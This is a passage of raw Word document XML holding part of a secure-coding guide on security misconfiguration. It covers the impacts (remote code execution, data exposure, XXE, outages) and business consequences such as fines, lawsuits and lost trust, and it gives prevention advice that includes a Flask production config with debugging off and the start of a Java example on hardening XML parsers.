        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Full Remote Code Execution (RCE):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Out-of-the-box development features, unremoved sample scripts, or debugging consoles (such as an exposed </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kubernetes dashboard or an unhardened web server console) can allow an attacker to run arbitrary system commands directly on the host OS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12834E9A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Mass Data Exfiltration &amp; Privacy Breaches:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Misconfigured cloud storage buckets (like public AWS S3 buckets) or poorly configured XML parsers (CWE-611) can let attackers read internal files, steal source code, or download entire databases containing sensitive user records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526B206B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Infrastructure Sabotage &amp; Server Downtime:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If an attacker accesses an unhardened orchestration layer or cloud console, they can tear down production clusters, wipe virtual machine instances, or alter internal DNS and network routing rules, leading to massive, prolonged denial-of-service states.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C784BB" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>2. Business Impact: Real-World Consequences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3BEE4C"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When technical system integrity fails due to an easily preventable misconfiguration, the downstream business consequences are severe, expensive, and long-lasting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7531B6E4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Regulatory Non-Compliance &amp; Severe Fines:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Regulatory frameworks do not view misconfigurations as sophisticated cyberattacks; they view them as negligence. Leaving an open cloud database containing Personal Identifiable Information (PII) or Protected Health Information (PHI) triggers massive regulatory fines under frameworks like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>GDPR</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>HIPAA</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>PCI-DSS</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F424E94" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Devastating Loss of Customer Trust:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> When a breach is traced back to an easily fixable error like a default password of </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>admin123</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or an unhardened server—the public perception of the company's security posture plummets. Customers migrate to competitors who demonstrate basic digital hygiene.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCD4014" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Legal Liability &amp; Class-Action Lawsuits:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Affected users, shareholders, and business partners frequently file class-action lawsuits against organizations that fail to maintain basic secure configuration baselines, resulting in millions of dollars in legal fees and settlements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462047EF" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Intellectual Property Theft:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Misconfigured development or staging environments often store proprietary source code, internal system blueprints, and trade secrets. If an attacker dumps this data due to an unhardened anonymous access setting, a company's competitive market advantage can be erased overnight.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7481A6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139EB7BE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>1. Secure Coding Practices &amp; Controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFB9FDB"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Preventing Security Misconfiguration requires developers to bake secure baselines directly into the application code and deployment configurations from day one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3230785D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Enforce Strict Framework Environment Profiles:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Modern development frameworks allow you to isolate development configurations from production configurations using environment profiles (e.g., Spring Profiles in Java, </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>NODE_ENV=production</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Node.js, or configuration classes in ASP.NET).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08865F88" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Code should be written to conditionally disable debugging features based on these environments. For example, in a Python Flask application, explicitly isolate configuration environments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260B8C6B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2416BE90" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t># config.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17995E0D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">class </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ProductionConfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B9D3FD" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    DEBUG = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010684C1" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    TESTING = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721F8CB1" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    PROPAGATE_EXCEPTIONS = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF0E708" w14:textId="2D2AF1B7" w:rsidR="00D66BA1" w:rsidRPr="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Disable Overly Informative Framework Features Programmatically:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D66BA1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement centralized global exception handling layers that intercept all raw server unhandled exceptions and convert them into safe, generic, non-informative HTTP responses (e.g., a standard </w:t>
      </w:r>
      <w:r w:rsidRPr="00D66BA1">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>500 Internal Server Error</w:t>
      </w:r>
      <w:r w:rsidRPr="00D66BA1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> page with a unique tracking </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D66BA1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>tracking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D66BA1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> reference ID rather than a stack trace).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DBEEFA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C4AFA1" w14:textId="64D00D88" w:rsidR="00D66BA1" w:rsidRPr="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Hardening XML Parsers (Defending Against CWE-611):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D66BA1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>When writing code that parses XML inputs, developers must explicitly disable external entity resolution native features within the parser factory code before processing input data. For example, in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B92A29C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0374FC77" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DocumentBuilderFactory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
